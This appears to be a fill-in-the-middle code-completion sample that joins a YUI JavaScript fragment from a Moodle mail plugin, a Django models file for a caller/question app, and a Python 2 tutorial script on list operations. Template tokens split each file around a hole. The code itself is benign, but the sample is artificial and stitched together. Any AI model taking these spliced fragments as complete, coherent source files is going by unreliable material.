== 'label') { num = parseInt(Y.one('input[name="itemid"]').get('value'), 10); mail_checkbox_labels_default[num] += 1; } }; var mail_menu_label_selection = function (node) { var checkbox = node.one('.mail_adv_checkbox'); if (checkbox) { mail_toggle_checkbox(checkbox); } }; var mail_customize_menu_label = function() { if (Y.all('.mail_menu_labels li').size() > 1) { if(mail_label_check_default_values()) { Y.one('.mail_menu_labels .mail_menu_label_newlabel').removeClass('mail_hidden'); Y.one('.mail_menu_labels .mail_menu_label_apply').addClass('mail_hidden'); } else { Y.one('.mail_menu_labels .mail_menu_label_newlabel').addClass('mail_hidden'); Y.one('.mail_menu_labels .mail_menu_label_apply').removeClass('mail_hidden'); } } }; var mail_label_check_default_values = function () { var isdefault = true; var classname; var labelid; var num; var labels = Y.all('.mail_menu_labels .mail_adv_checkbox'); if (!mail_message_view) { var total = mail_get_checkboxs_checked().size(); Y.each(labels, function(label, index) { classname = label.getAttribute('class'); num = /mail_label_value_(\d+)/.exec(classname); if (num) { labelid = num[1]; if (mail_checkbox_labels_default[labelid] == total) { isdefault = isdefault && label.hasClass('mail_checkbox1'); } else if(mail_checkbox_labels_default[labelid] > 0) { isdefault = isdefault && label.hasClass('mail_checkbox2'); } else { isdefault = isdefault && label.hasClass('mail_checkbox0'); } } }); } else { Y.each(labels, function(label, index) { classname = label.getAttribute('class'); num = /mail_label_value_(\d+)/.exec(classname); if (num) { labelid = num[1]; if (mail_checkbox_labels_default[labelid] == 1) { isdefault = isdefault && label.hasClass('mail_checkbox1'); } else { isdefault = isdefault && label.hasClass('mail_checkbox0'); } } }); } return isdefault; }; var mail_label_set_values = function () { var total = (mail_message_view?1:mail_get_checkboxs_checked().size()); var state; Y.each(mail_checkbox_labels_default, function(value, index){ if (value == total) { state = 1; } else if(value > 0) { state = 2; } else { state = 0; } mail_set_checkbox(Y.one('.mail_menu_labels .mail_label_value_'+index), state); }); }; var mail_get_label_value = function(checkbox){ var value; classnames = 
checkbox.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_label_value_(\d+)/.exec(classname); if (num) { value = num[1]; } }); return value; }; var mail_get_labels_checked = function(){ return Y.all('.mail_menu_labels .mail_checkbox1'); }; var mail_get_labels_thirdstate = function(){ return Y.all('.mail_menu_labels .mail_checkbox2'); }; var mail_get_labels_values = function(thirdstate){ var nodes = (thirdstate?mail_get_labels_thirdstate():mail_get_labels_checked()); var values = []; Y.each(nodes, function (node, index) { values.push(mail_get_label_value(node)); }); return values.join(); }; var mail_assign_labels = function (node) { node = (typeof node !== 'undefined' ? node : false); var grouplabels; var elem; var labelid = 0; if (mail_message_view) { grouplabels = Y.one('.mail_group_labels'); } else { grouplabels = node.ancestor('.mail_item').one('.mail_group_labels'); } if (mail_view_type == 'label') { labelid = parseInt(Y.one('input[name="itemid"]').get('value'), 10); } var lblstoadd = mail_get_labels_values(false).split(','); var lblstoremain = mail_get_labels_values(true).split(','); Y.each(M.local_mail.mail_labels, function (value, index) { if (Y.Array.indexOf(lblstoadd, index) != -1) { if (index != labelid) { elem = grouplabels.one('.mail_label_'+index); if (!elem) { elem = Y.Node.create('<span class="mail_label mail_label_'+M.local_mail.mail_labels[index].color+' mail_label_'+index+'">'+M.local_mail.mail_labels[index].name+'</span>'); grouplabels.append(elem); } } } else if (Y.Array.indexOf(lblstoremain, index) == -1) { if (!mail_message_view && index == labelid) { grouplabels.ancestor('.mail_item').remove(); } else { elem = grouplabels.one('.mail_label_'+index); if (elem) { elem.remove(); } } } }); }; var mail_check_selected = function() { mail_enable_all_buttons(Y.all('.mail_selected').size()); }; var mail_enable_button = function(button, bool) { bool = (typeof bool !== 'undefined' ? 
bool : false); if (bool) { button.removeClass('mail_button_disabled'); } else if(!button.hasClass('mail_checkbox_all')){ button.addClass('mail_button_disabled'); } }; var mail_enable_all_buttons = function(bool) { var mail_buttons = Y.all('.mail_toolbar .mail_buttons .mail_button'); Y.each(mail_buttons, (function(button) { button.removeClass('mail_hidden'); mail_enable_button(button, bool); })); if (Y.one('#mail_search')) { mail_enable_button(Y.one('#mail_search'), true); } if (Y.one('#buttonsearch')) { mail_enable_button(Y.one('#buttonsearch'), true); } if (Y.one('#buttoncancelsearch')) { mail_enable_button(Y.one('#buttoncancelsearch'), true); } if (mail_view_type == 'label') { mail_enable_button(Y.one('.mail_toolbar .mail_more_actions'), true); } }; var mail_get_checkboxs_checked = function(){ return Y.all('.mail_list .mail_checkbox1'); }; var mail_get_checkbox_value = function(checkbox){ var value; classnames = checkbox.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_checkbox_value_(\d+)/.exec(classname); if (num) { value = num[1]; } }); return value; }; var mail_get_checkboxs_values = function(){ var nodes = mail_get_checkboxs_checked(); var values = []; Y.each(nodes, function (node, index) { values.push(mail_get_checkbox_value(node)); }); return values.join(); }; var mail_set_checkbox = function(node, value){ if (value == 1) { node.removeClass('mail_checkbox0').removeClass('mail_checkbox2').addClass('mail_checkbox1'); } else if (value == 2) { node.removeClass('mail_checkbox0').removeClass('mail_checkbox1').addClass('mail_checkbox2'); } else { node.removeClass('mail_checkbox1').removeClass('mail_checkbox2').addClass('mail_checkbox0'); } }; var mail_toggle_checkbox = function(node){ if (node.hasClass('mail_checkbox0')) { mail_set_checkbox(node, 1); } else { mail_set_checkbox(node, 0); } }; var mail_is_checkbox_checked = function(node){ return node.hasClass('mail_checkbox1'); }; var mail_main_checkbox = function(){ if(!Y.all('.mail_selected').size()) { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 0); } else if(Y.all('.mail_selected').size() == Y.all('.mail_item').size()) { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 1); } else { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 2); } mail_check_selected(); }; var mail_select_all = function(){ var checkbox = Y.one('.mail_checkbox_all > .mail_adv_checkbox'); mail_set_checkbox(checkbox, 1); var nodes = Y.all('.mail_list .mail_adv_checkbox'); nodes.each(function(node) { mail_set_checkbox(node, 1); node.ancestor('.mail_item').addClass('mail_selected'); }); }; var mail_select_none = function(){ var checkbox = Y.one('.mail_checkbox_all > .mail_adv_checkbox'); mail_set_checkbox(checkbox, 0); var nodes = Y.all('.mail_list .mail_adv_checkbox'); nodes.each(function(node) { mail_set_checkbox(node, 0); node.ancestor('.mail_item').removeClass('mail_selected'); }); }; var mail_select_read = function(){ var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (!ancestor.hasClass('mail_unread')){ mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_unread = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if 
(ancestor.hasClass('mail_unread')){ mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_starred = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (ancestor.one('.mail_starred')) { mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_unstarred = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (ancestor.one('.mail_unstarred')) { mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; //Success call var handleSuccess = function (transactionid, response, args) { var obj = Y.JSON.parse(response.responseText); var img; var node; if (obj.msgerror) { alert(obj.msgerror); } else { if (obj.html) { Y.one('#local_mail_main_form').setContent(obj.html); init(); mail_update_url(); } if (obj.search) { mail_perpageid = obj.search.perpageid; mail_doing_search = true; Y.one('#mail_search').addClass('mail_button_searching'); Y.one('.mail_paging input[name="prevpage"]').set('disabled', 'disabled'); Y.one('.mail_paging input[name="nextpage"]').set('disabled', 'disabled'); Y.one('.mail_paging > span').addClass('mail_hidden'); mail_search_selected = obj.search.query; mail_searchfrom_selected = obj.search.searchfrom; mail_searchto_selected = obj.search.searchto; mail_unread_selected = obj.search.unread; mail_attach_selected = obj.search.attach; mail_date_selected = obj.search.date; mail_update_form_search(); if (obj.search.prev) { Y.one('.mail_paging input[name="prevpage"]').set('disabled', ''); } if (obj.search.next) { Y.one('.mail_paging input[name="nextpage"]').set('disabled', ''); } if (!mail_message_view) { mail_before_message_search = obj.search.idbefore; mail_after_message_search = obj.search.idafter; } } if (obj.info) { if (obj.info.root) { node = Y.one('.mail_root span'); if (node) { node.setContent(obj.info.root); } node = Y.one('.mail_root'); if (node) { if(obj.info.root.match(/\(\d+\)/)) { node.addClass('local_mail_new_messages'); } else { node.removeClass('local_mail_new_messages'); } } } if (obj.info.inbox) { node = Y.one('.mail_inbox a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_inbox a'); if (node) { node.setContent(img+obj.info.inbox); } } } if (obj.info.drafts) { node = Y.one('.mail_drafts a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_drafts a'); if (node) { node.setContent(img+obj.info.drafts); } } } if (obj.info.courses) { Y.each(obj.info.courses, (function(value, index) { node = Y.one('.mail_course_'+index+' a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_course_'+index+' a'); if (node) { Y.one('.mail_course_'+index+' a').setContent(img+value); } } })); } if (obj.info.labels) { Y.each(obj.info.labels, (function(value, index) { node = Y.one('.mail_label_'+index+' a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_label_'+index+' a'); if (node) { node.setContent(img+value); } } })); } } //Undo last action if (obj.undo && mail_undo_function != 'undo') { var msg = M.util.get_string('undo'+mail_undo_function, 'local_mail', obj.undo.split(',').length); if 
(mail_undo_function == 'delete') { mail_undo_function = 'restore'; } else if (mail_undo_function == 'restore') { mail_undo_function = 'delete'; } mail_notification_message(msg); mail_undo_ids = obj.undo; } else { mail_undo_function = ''; } if(obj.redirect) { document.location.href = obj.redirect; } } }; //Failure call var handleFailure = function (transactionid, response, args) { console.log(response); }; //Update screen data and async call var mail_doaction = function(action, node) { node = (typeof node !== 'undefined' ? node : null); var nodes = mail_get_checkboxs_checked(); var obj; var child; var ancestor; var ids; var request; var mail_view; if(mail_message_view) { if(action == 'togglestarred') { obj = node.one('span'); if (obj.hasClass('mail_starred')) { action = 'unstarred'; obj.replaceClass('mail_starred', 'mail_unstarred'); node.set('title', M.util.get_string('unstarred','local_mail')); } else { action = 'starred'; obj.replaceClass('mail_unstarred', 'mail_starred'); node.set('title', M.util.get_string('starred','local_mail')); } } else if (action == 'delete' || action == 'restore') { mail_undo_function = action; mail_message_view = false; } else if (action == 'starred') { node = Y.one('.mail_flags span'); node.replaceClass('mail_unstarred', 'mail_starred'); node.ancestor('a').set('title', M.util.get_string('starred','local_mail')); } else if (action == 'unstarred') { node = Y.one('.mail_flags span'); node.replaceClass('mail_starred', 'mail_unstarred'); node.ancestor('a').set('title', M.util.get_string('unstarred','local_mail')); } else if(action == 'markasunread') { mail_message_view = false; } else if(action == 'goback') { mail_message_view = false; } else if(action == 'assignlabels') { mail_assign_labels(); } mail_view = true; ids = Y.one('input[name="m"]').get('value'); } else {//List messages view if(action == 'viewmail') { nodes.empty(); var url = node.get('href'); if (url.match(/compose\.php/)){ document.location.href = url; return 0; } else { ids = /m=(\d+)/.exec(node.get('href'))[1]; } } else if (action == 'delete') { mail_undo_function = action; ids = mail_get_checkboxs_values(); } else if (action == 'restore') { mail_undo_function = action; ids = mail_get_checkboxs_values(); } else if (action == 'discard') { ids = mail_get_checkboxs_values(); } else if (action == 'undo') { nodes.empty(); action = mail_undo_function; mail_undo_function = 'undo'; ids = mail_undo_ids; } else if (action == 'togglestarred') { obj = node.ancestor('.mail_item').one('.mail_adv_checkbox'); nodes = Y.all(obj); if (node.one('span').hasClass('mail_starred')) { action = 'unstarred'; } else { action = 'starred'; } ids = mail_get_checkbox_value(obj); } else if(action == 'perpage' || action == 'search'){ nodes.empty(); } else { ids = mail_get_checkboxs_values(); } if (nodes.size()) { nodes.each(function (node) { ancestor = node.ancestor('.mail_item'); if (action == 'starred') { child = ancestor.one('.mail_unstarred'); if(child) { child.replaceClass('mail_unstarred', 'mail_starred'); child.ancestor('a').set('title', M.util.get_string('starred','local_mail')); } } else if(action == 'unstarred') { if (mail_view_type == 'starred') { ancestor.remove(); } else { child = ancestor.one('.mail_starred'); if(child) { child.replaceClass('mail_starred', 'mail_unstarred'); child.ancestor('a').set('title', M.util.get_string('unstarred','local_mail')); } } } else if(action == 'markasread') { ancestor.removeClass('mail_unread'); } else if(action == 'markasunread') { ancestor.addClass('mail_unread'); } else if(action == 
'delete' || action == 'restore' || action == 'discard') { ancestor.remove(); } else if(action == 'assignlabels') { mail_assign_labels(node); } }); } mail_view = false; } //Ajax call var cfg = { method: 'POST', data: { msgs: ids, sesskey: Y.one('input[name="sesskey"]').get('value'), type: mail_view_type, offset: Y.one('input[name="offset"]').get('value'), action: action, mailview: mail_view }, on: { success:handleSuccess, failure:handleFailure } }; if (Y.one('input[name="m"]')) { cfg.data.m = Y.one('input[name="m"]').get('value'); } if(Y.one('input[name="itemid"]')) { cfg.data.itemid = Y.one('input[name="itemid"]').get('value'); } if (action == 'perpage') { cfg.data.perpage = (node.get('innerText')?node.get('innerText'):node.get('textContent')); } if (action == 'assignlabels') { cfg.data.labelids = mail_get_labels_values(false); cfg.data.labeltsids = mail_get_labels_values(true); } if (action == 'setlabel') { obj = Y.one('#local_mail_edit_label_color'); cfg.data.labelname = Y.one('#local_mail_edit_label_name').get('value'); if (!cfg.data.labelname) { alert(M.util.get_string('erroremptylabelname', 'local_mail')); mail_label_edit(); return false; } else if (cfg.data.labelname.length > 100) { alert(M.util.get_string('maximumchars', 'moodle', 100)); mail_label_edit(); return false; } cfg.data.labelcolor = obj.get('value'); } if (action == 'newlabel') { obj = Y.one('#local_mail_new_label_color'); cfg.data.labelname = Y.one('#local_mail_new_label_name').get('value'); if (!cfg.data.labelname) { alert(M.util.get_string('erroremptylabelname', 'local_mail')); mail_label_new(); return false; } else if (cfg.data.labelname.length > 100) { alert(M.util.get_string('maximumchars', 'moodle', 100)); mail_label_new(); return false; } cfg.data.labelcolor = obj.get('value'); } if (action == 'nextpage' || action == 'prevpage' ) { obj = Y.one('#mail_loading_small'); var btn = Y.one('.mail_paging input[name="'+action+'"]'); var position = btn.getXY(); obj.removeClass('mail_hidden'); position[0] += (btn.get('offsetWidth')/2) - (obj.one('img').get('offsetWidth')/2); position[1] = btn.getXY()[1] + (obj.one('img').get('offsetHeight')/2); obj.setXY(position); } if (mail_doing_search) { //Go back when searching keeps current page if (action == 'goback') { if (mail_before_message_search) { cfg.data.before = mail_before_message_search; } else if (mail_after_message_search) { cfg.data.after = mail_after_message_search; } } cfg.data.search = mail_search_selected; cfg.data.searchfrom = mail_searchfrom_selected; cfg.data.searchto = mail_searchto_selected; cfg.data.unread = (mail_unread_selected?'1':''); cfg.data.attach = (mail_attach_selected?'1':''); cfg.data.time = mail_date_selected; cfg.data.perpageid = mail_perpageid; if (action == 'prevpage') { obj = Y.one('.mail_list .mail_item .mail_adv_checkbox'); if (obj) { cfg.data.after = mail_get_checkbox_value(obj); } cfg.data.action = 'search'; } else if (action == 'nextpage') { obj = Y.all('.mail_item:last-child .mail_adv_checkbox'); if (obj) { cfg.data.before = mail_get_checkbox_value(obj.shift()); cfg.data.perpageid = cfg.data.before; } cfg.data.action = 'search'; } cfg.data.searching = true; } if (mail_undo_function == 'undo') { cfg.data.undo = true; } request = Y.io(M.cfg.wwwroot + '/local/mail/ajax.php', cfg); }; var mail_label_confirm_delete = function(e) { var labelid; var message; var labelname = ''; labelid = Y.one('input[name="itemid"]').get('value'); labelname = M.local_mail.mail_labels[labelid].name; if (labelname.length > 25) { labelname = labelname.substring(0, 
25) + '...'; } message = M.util.get_string('labeldeleteconfirm', 'local_mail', labelname); M.util.show_confirm_dialog(e, { 'callback' : mail_label_remove, 'message' : message, 'continuelabel': M.util.get_string('delete', 'local_mail') } ); }; var mail_label_remove = function() { var params = []; params.push('offset='+Y.one('input[name="offset"]').get('value')); params.push('sesskey='+Y.one('input[name="sesskey"]').get('value')); params.push('removelbl=1'); params.push('confirmlbl=1'); var url = Y.one('#local_mail_main_form').get('action'); document.location.href = url+'&'+params.join('&'); }; var mail_label_new = function() { mail_new_label_panel.show(); Y.one('#local_mail_form_new_label').removeClass('mail_hidden'); Y.one('#local_mail_new_label_name').focus(); }; var mail_label_edit = function() { var labelid = Y.one('input[name="itemid"]').get('value'); var labelname = M.local_mail.mail_labels[labelid].name; var labelcolor = M.local_mail.mail_labels[labelid].color; Y.one('#local_mail_edit_label_name').set('value', labelname); Y.all('.mail_label_color').removeClass('mail_label_color_selected'); if (!labelcolor) { Y.one('.mail_label_color.mail_label_nocolor').addClass('mail_label_color_selected'); labelcolor = ''; } else { Y.one('.mail_label_color.mail_label_' + labelcolor).addClass('mail_label_color_selected'); } Y.one('#local_mail_edit_label_color').set('value', labelcolor); mail_edit_label_panel.show(); Y.one('#local_mail_form_edit_label').removeClass('mail_hidden'); Y.one('#local_mail_edit_label_name').focus(); }; var mail_label_set_selected = function(obj, action) { Y.all('.mail_label_color').removeClass('mail_label_color_selected'); obj.addClass('mail_label_color_selected'); Y.one('#local_mail_' + action + '_label_color').set('value', obj.getAttribute('data-color')); }; var mail_update_url = function() { var params = []; var offset; var m; var type; if (history.pushState) { params.push('t='+mail_view_type); if (mail_message_view) { params.push('m='+Y.one('input[name="m"]').get('value')); } if (mail_view_type == 'course') { params.push('c='+Y.one('input[name="itemid"]').get('value')); } else { if (mail_view_type == 'label') { params.push('l='+Y.one('input[name="itemid"]').get('value')); } } offset = Y.one('input[name="offset"]').get('value'); if (parseInt(offset, 10) > 0) { params.push('offset='+offset); } history.pushState({}, document.title, M.cfg.wwwroot + '/local/mail/view.php?' 
+ params.join('&')); } }; var mail_position_datepicker = function() { var menu = Y.one('#mail_menu_search'); var datepicker = Y.one('#dateselector-calendar-panel'); var search = Y.one('.mail_search_datepicker'); var position = menu.getXY(); position[0] += (menu.get('offsetWidth')/2) - (datepicker.get('offsetWidth')/2); position[1] = search.getXY()[1] - datepicker.get('offsetHeight'); datepicker.setXY(position); }; var mail_get_selected_date = function(cell, date) { mail_date_selected = cell.date.getFullYear() + ',' + cell.date.getMonth() + ',' + cell.date.getDate(); mail_set_selected_date(mail_date_selected); M.form.dateselector.panel.hide(); }; var mail_set_selected_date = function(date) { if (date) { var elems = date.split(','); date = Y.Date.format(new Date(elems[0], elems[1], elems[2]), {format:"%x"}) } else { date = Y.Date.format(new Date(), {format:"%x"}) } Y.one('#searchdate').set('text', date); }; var mail_notification_message = function(message) { if (message) { Y.one('#mail_notification').addClass('mail_enabled').removeClass('mail_novisible'); Y.one('#mail_notification_message').setContent(message); Y.one('#mail_notification_undo').removeClass('mail_novisible'); } else { Y.one('#mail_notification').removeClass('mail_enabled').addClass('mail_novisible'); Y.one('#mail_notification_message').setContent(''); Y.one('#mail_notification_undo').addClass('mail_novisible'); } }; var mail_reset_date_selected = function() { date = new Date(); mail_date_selected = date.getFullYear() + ',' + date.getMonth() + ',' + date.getDate(); M.form.dateselector.calendar.deselectDates(date); }; /*** Event listeners***/ //Background selection Y.one("#region-main").delegate('click', function(e) { var ancestor = this.ancestor('.mail_item'); mail_toggle_checkbox(this); ancestor.toggleClass('mail_selected'); mail_main_checkbox(); mail_customize_menu_actions(this); }, '.mail_list .mail_adv_checkbox'); //Select all/none Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_checkbox(this); mail_hide_menu_options(); mail_hide_menu_labels(); if (mail_is_checkbox_checked(this)) { mail_select_all(); } else { mail_select_none(); } mail_check_selected(); mail_update_menu_actions(); }, '.mail_checkbox_all > .mail_adv_checkbox'); //Toggle menu select all/none Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_menu(); mail_hide_menu_actions(); mail_hide_menu_labels(); mail_hide_menu_search(); }, '.mail_checkbox_all'); //Checkbox hides other menus Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_options(); mail_hide_menu_labels(); }, '.mail_checkbox_all > .mail_adv_checkbox'); //Toggle menu actions Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_menu_actions(); mail_hide_menu_options(); mail_hide_menu_labels(); mail_hide_menu_search(); }, '.mail_more_actions'); //Toggle menu actions Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_label_default_values(); mail_customize_menu_label(); mail_toggle_menu_labels(); mail_hide_menu_options(); mail_hide_menu_actions(); mail_hide_menu_search(); }, '.mail_assignlbl'); //Menu select all Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_all(); mail_update_menu_actions(); }, '.mail_menu_option_all'); //Menu select none Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); mail_select_none(); }, '.mail_menu_option_none'); //Menu select 
read
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_toggle_menu();
        mail_select_read();
        mail_main_checkbox();
        mail_update_menu_actions();
    }, '.mail_menu_option_read');

    //Menu select unread
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_toggle_menu();
        mail_select_unread();
        mail_main_checkbox();
        mail_update_menu_actions();
    }, '.mail_menu_option_unread');

    //Menu select starred
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_toggle_menu();
        mail_select_starred();
        mail_main_checkbox();
        mail_update_menu_actions();
    }, '.mail_menu_option_starred');

    //Menu select unstarred
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_toggle_menu();
        mail_select_unstarred();
        mail_main_checkbox();
        mail_update_menu_actions();
    }, '.mail_menu_option_unstarred');

    Y.one("#region-main").delegate('click', function(e) {
        mail_check_selected();
    }, '.mail_optselect');

    Y.one("#region-main").delegate('click', function(e) {
        e.stopPropagation();
    }, '.mail_labelselect');

    //Menu action starred
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('starred');
        mail_update_menu_actions();
    }, '.mail_menu_action_markasstarred');

    //Menu action unstarred
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('unstarred');
        mail_update_menu_actions();
    }, '.mail_menu_action_markasunstarred');

    //Menu action markasread
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('markasread');
        mail_update_menu_actions();
    }, '.mail_menu_action_markasread');

    //Menu action markasunread
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('markasunread');
        mail_update_menu_actions();
    }, '.mail_menu_action_markasunread');

    //Menu action editlabel
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_label_edit();
    }, '.mail_menu_action_editlabel');

    //Menu action removelabel
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_label_confirm_delete(e);
    }, '.mail_menu_action_removelabel');

    //Starred and unstarred
    Y.one('#region-main').delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('togglestarred', this);
        mail_update_menu_actions();
    }, '.mail_flags a');

    //Delete button
    Y.one("#region-main").delegate('click', function(e) {
        if (!this.hasClass('mail_button_disabled')) {
            mail_doaction('delete');
        }
    }, '#mail_delete');

    //Discard button
    Y.one("#region-main").delegate('click', function(e) {
        if (!this.hasClass('mail_button_disabled')) {
            mail_doaction('discard');
        }
    }, '#mail_discard');

    //Restore button
    Y.one("#region-main").delegate('click', function(e) {
        if (!this.hasClass('mail_button_disabled')) {
            mail_doaction('restore');
        }
    }, '#mail_restore');

    //Prev page button
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('prevpage');
    }, 'input[name="prevpage"]');

    //Next page button
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('nextpage');
    }, 'input[name="nextpage"]');

    //Go back button
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('goback');
    }, '.mail_goback');

    //Mail per page
    Y.one("#region-main").delegate('click', function(e) {
        e.preventDefault();
        mail_doaction('perpage', this);
    }, 'div.mail_perpage a');

    //Hide all menus
    Y.on('click', function(e) {
        mail_hide_menu_options();
        mail_hide_menu_actions();
        mail_hide_menu_labels();
mail_hide_menu_search(); }, 'body'); //Show message Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doaction('viewmail', this); }, 'a.mail_link'); //Click apply changes on labels Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_labels(); mail_doaction('assignlabels'); }, '.mail_menu_label_apply'); //Click new label Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_labels(); mail_label_new(); }, '.mail_menu_label_newlabel'); //Click label on menu labels Y.one("#region-main").delegate('click', function(e) { mail_menu_label_selection(this); mail_customize_menu_label(); }, '.mail_menu_labels li'); //Click notification bar undo Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); var ancestor = Y.one('#mail_notification'); if (ancestor.hasClass('mail_enabled')) { ancestor.removeClass('mail_enabled').addClass('mail_novisible'); mail_doaction('undo'); } }, '#mail_notification_undo'); //Click cancel search button Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_doing_search = false; mail_hide_menu_search(); mail_doaction('goback'); mail_before_message_search = false; mail_after_message_search = false; mail_reset_date_selected(); }, '#buttoncancelsearch'); //Click search button Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); var date; mail_hide_menu_options(); mail_hide_menu_actions(); mail_hide_menu_labels(); mail_toggle_menu_search(); if (!mail_date_selected) { mail_reset_date_selected(); } mail_set_selected_date(mail_date_selected); }, '#mail_search'); //Click menu search Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); M.form.dateselector.panel.hide(); }, '#mail_menu_search'); //Click adv search Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_adv_search(); }, '#mail_toggle_adv_search'); //Click date search Y.one("#local_mail_main_form").delegate('click', function(e) { e.stopPropagation(); if(Y.one('#dateselector-calendar-panel').hasClass('yui3-overlay-hidden')) { M.form.dateselector.panel.show(); } else { M.form.dateselector.panel.hide(); } }, '.mail_search_date'); Y.on('contentready', function() { if (M.form.dateselector.calendar) { M.form.dateselector.calendar.on('dateClick', mail_get_selected_date); M.form.dateselector.calendar.set('maximumDate', new Date()); M.form.dateselector.panel.set('zIndex', 1); Y.one('#dateselector-calendar-panel').setStyle('border', 0); M.form.dateselector.calendar.render(); } }, '#dateselector-calendar-panel'); //Click on button search Y.one("#region-main").delegate('keydown', function(e) { e.stopPropagation(); if (e.keyCode == 13) { this.focus(); mail_do_search(); } }, '#textsearch, #textsearchfrom, #textsearchto'); //Click on button search Y.one("#region-main").delegate('click', function(e) { mail_do_search(); }, '#buttonsearch');<|fim▁hole|> mail_update_url(); });<|fim▁end|>
//Initialize
init();
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models class TimeStampedModel(models.Model): created = models.DateTimeField(auto_now_add=True) modified = models.DateTimeField(auto_now=True) class Meta: abstract = True class Caller(TimeStampedModel): name = models.CharField(max_length=30) phone_number = models.CharField(max_length=15) question_num = models.IntegerField(default=0) start_num = models.IntegerField(default=0) end_num = models.IntegerField(default=0) start_fresh = models.BooleanField(default=True) intro_text = models.CharField(max_length=1600) outro_text = models.CharField(max_length=1600) def __str__(self): return self.name<|fim▁hole|>class Question(TimeStampedModel): num = models.IntegerField() question_text = models.CharField(max_length=1600) def __str__(self): return self.question_text[:100] + '...' class Choice(TimeStampedModel): question = models.ForeignKey(Question, related_name='choices') choice_text = models.CharField(max_length=1600) num = models.IntegerField() def __str__(self): return self.choice_text[:100] + '...'<|fim▁end|>
<|file_name|>lists2.py<|end_file_name|><|fim▁begin|>def no_extreme(listed): """ Takes a list and chops off extreme ends """ del listed[0] del listed[-1:] return listed def better_no_extreme(listed): """ why better ? For starters , does not modify original list<|fim▁hole|> return listed[1:-1] t = ['a','b','c'] print t print '\n' print 'pop any element : by t.pop(1) or t.remove(\'b\') or del t[1]' del t[1] print t st = ['a','b','c','d','e','f'] print st del st[1:3] print 'del t[1:3] works as well : ', st print 'Mid part is : ',no_extreme(st) str = raw_input("\nEnter a string to be converted to list : ") listr = list(str) print listr str2=raw_input("\nEnter a line to be separated into words : ") listr2 = str2.split()#separated at spaces print listr2 print 'You can split a line into words by changing the parameter as str2.split(parameter)' print 'this splits at - ' print 'joining statement : ' delimeter=' ' print delimeter.join(listr2) print '\nNote: 2 identical lists are 2 objects ,so l_a is l_b for identical lists still says False' print 'This does not happen for strings etc' print 'l_a is l_b only true if assigned as l_b = l_a' print '\n t.append(x) returns None , whereas t+[y] is not None' print '\n Never t = t[1:] as empty , same goes for t.sort()' print '\nDO\'s : t.append(x)\n t = t+[x] \n ' print 'Keep copy of original just in case : orig = t[:] \nt.sort()' print '\nDONT\'s : t.append([x])\n t = t.append(x) \n t + [x] \n t = t + x'<|fim▁end|>
"""